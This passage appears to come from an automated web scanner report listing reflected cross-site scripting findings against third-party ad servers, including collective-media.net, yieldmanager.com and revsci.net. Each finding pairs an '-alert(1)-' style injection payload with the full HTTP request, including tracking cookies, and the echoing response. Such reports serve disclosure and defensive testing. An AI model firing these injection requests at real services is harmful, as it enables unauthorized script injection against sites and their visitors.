<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30323483817_1316222419","http://ad.doubleclick.net/adj/q1.bosherald5fae6'-alert(1)-'317c5c0c938/ent_fr;net=q1;u=,q1-30323483817_1316222419,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt>
...[SNIP]...
|
4.34. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/q1.bosherald/ent_fr |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0fe9'-alert(1)-'e1c69b32c7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/ent_frb0fe9'-alert(1)-'e1c69b32c7b;sz=300x250;net=q1;ord=1813138297?;env=ifr;ord1=336916;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:21 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30419507438_1316222421","http://ad.doubleclick.net/adj/q1.bosherald/ent_frb0fe9'-alert(1)-'e1c69b32c7b;net=q1;u=,q1-30419507438_1316222421,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt>
...[SNIP]...
|
4.35. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/q1.bosherald/ent_fr |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df0e3'-alert(1)-'44b07b60aae was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/ent_fr;sz=df0e3'-alert(1)-'44b07b60aae HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7329
Date: Sat, 17 Sep 2011 01:20:07 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
age="Javascript">CollectiveMedia.createAndAttachAd("q1-30421855631_1316222407","http://ad.doubleclick.net/adj/q1.bosherald/ent_fr;net=q1;u=,q1-30421855631_1316222407,12298b058f07061,none,;;cmw=nurl;sz=df0e3'-alert(1)-'44b07b60aae;contx=none;dc=s;btg=?","df0e3'-alert(1)-'44b07b60aae","",true);</scr'+'ipt>
...[SNIP]...
|
4.36. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/q1.bosherald/news |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8832c'-alert(1)-'b89805fab1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj8832c'-alert(1)-'b89805fab1f/q1.bosherald/news;sz=728x90;net=q1;ord=354527464?;env=ifr;ord1=736181;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:53 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30423216503_1316221793","http://ad.doubleclick.net/adj8832c'-alert(1)-'b89805fab1f/q1.bosherald/news;net=q1;u=,q1-30423216503_1316221793,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt>
...[SNIP]...
|
4.37. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/q1.bosherald/news |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbba4'-alert(1)-'e84b40c6dcb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosheralddbba4'-alert(1)-'e84b40c6dcb/news;sz=728x90;net=q1;ord=354527464?;env=ifr;ord1=736181;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:54 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30101077229_1316221794","http://ad.doubleclick.net/adj/q1.bosheralddbba4'-alert(1)-'e84b40c6dcb/news;net=q1;u=,q1-30101077229_1316221794,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt>
...[SNIP]...
|
4.38. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/q1.bosherald/news |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f033d'-alert(1)-'85ce176899a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/newsf033d'-alert(1)-'85ce176899a;sz=728x90;net=q1;ord=354527464?;env=ifr;ord1=736181;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:54 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30223795082_1316221794","http://ad.doubleclick.net/adj/q1.bosherald/newsf033d'-alert(1)-'85ce176899a;net=q1;u=,q1-30223795082_1316221794,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt>
...[SNIP]...
|
4.39. http://a.collective-media.net/cmadj/q1.bosherald/news [sz parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/q1.bosherald/news |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48057'-alert(1)-'6d221538d81 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/news;sz=48057'-alert(1)-'6d221538d81 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7327
Date: Sat, 17 Sep 2011 01:09:50 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
guage="Javascript">CollectiveMedia.createAndAttachAd("q1-30113229668_1316221790","http://ad.doubleclick.net/adj/q1.bosherald/news;net=q1;u=,q1-30113229668_1316221790,12298b058f07061,none,;;cmw=nurl;sz=48057'-alert(1)-'6d221538d81;contx=none;dc=s;btg=?","48057'-alert(1)-'6d221538d81","",true);</scr'+'ipt>
...[SNIP]...
|
4.40. http://ad.yieldmanager.com/imp [u parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ad.yieldmanager.com |
| Path: |
/imp |
Issue detail
The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72a06'%3balert(1)//5908bbe03b7 was submitted in the u parameter. This input was echoed as 72a06';alert(1)//5908bbe03b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?anmember=514&anprice=&Z=300x250&s=2298003&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F&u=http://www.tmz.com/72a06'%3balert(1)//5908bbe03b7 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!$%00!!#RS!$XpC!1R*F!%`E+!!!!$!?5%!)H`@:!wVd.!%FMM!'lGU!'m1A~~~~~=4jht=6h5P~"; ih="b!!!!>!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1R*F!!!!#=4jht!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2/j6!!!!#=4qsr!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; bh="b!!!#v!!-C,!!!!%=3`c_!!-G2!!!!%=5$1G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!$=57ob!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4u!!!!#=54Pi!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!x^1!!!!$=5,??!!y)?!!!!#=3*$x!##!)!!!!$=5#lv!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#6]*!!!!$=5#lv!#7wf!!!!#=51w'!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q/x!!!!#=5,(/!#Q]:!!!!#=4YXv!#Q_h!!!!$=3gb9!#QoI!!!!#=5,',!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#T<,!!!!$=5,??!#UD`!!!!$=3**U!#UL(!!!!#=5$1H!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!$=4X0s!#eCK!!!!$=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#qq%!!!!#=4jf'!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#v5N!!!!$=5#lm!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$'.I!!!!$=5$1G!$'.K!!!!#=5$1G!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-`?!!!!#=4jeq!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!)=4_L-!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:jo!!!!%=5,9,!$<DI!!!!#=3G@^!$<Rh!!!!#=5$$X!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:43 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0341.rm.sp2
Set-Cookie: ih="b!!!!#!3e$^!!!!C=57qT"; path=/; expires=Mon, 16-Sep-2013 00:54:43 GMT
Set-Cookie: vuday1=8ac=%N5HGH?9-O6; path=/; expires=Sun, 18-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!$7w.!!%f!!%d(@!3e$^!'/%f!!mT+~)I#RI!ZmB)!(XE3!(Gex~~~~~~=57qT=9K[_!!.vL"; path=/; expires=Mon, 16-Sep-2013 00:54:43 GMT
Set-Cookie: liday1=x6!2#N5HGH:SAxO; path=/; expires=Sun, 18-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 00:54:43 GMT
Pragma: no-cache
Content-Length: 2619
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close
document.write('<span id="10288627">');
//raw JavaScript
document.write('<scr'+'ipt language=\'javascr'+'ipt\' type=\'text/javascr'+'ipt\' src=\'http://imp.fetchback.com/serve/fb/adtag.js?tid=6832
...[SNIP]...
d = '261950';
var asci_publiid = '3449146';
var asci_sectid = '2298003';
var asci_advliid = '3329023';
var asci_cid = '10288627';
var asci_p = '99';
var asci_refurl = escape('http://www.tmz.com/72a06';alert(1)//5908bbe03b7');
if ( asci_refurl.length >
...[SNIP]...
|
4.41. http://adnxs.revsci.net/imp [Z parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://adnxs.revsci.net |
| Path: |
/imp |
Issue detail
The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 906f3'-alert(1)-'8a5c815ddd2 was submitted in the Z parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=300x250906f3'-alert(1)-'8a5c815ddd2&s=2298003&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:52:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:52:50 GMT
Content-Length: 454
document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250906f3'-alert(1)-'8a5c815ddd2&referrer=http://www.tmz.com/&inv_code=2298003&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250906f3%27-alert%281%29-%278a5c815ddd2%26s%3D229800
...[SNIP]...
|
4.42. http://adnxs.revsci.net/imp [s parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://adnxs.revsci.net |
| Path: |
/imp |
Issue detail
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3e33'-alert(1)-'9eac11f134b was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=300x250&s=2298003f3e33'-alert(1)-'9eac11f134b&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:53:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:53:10 GMT
Content-Length: 454
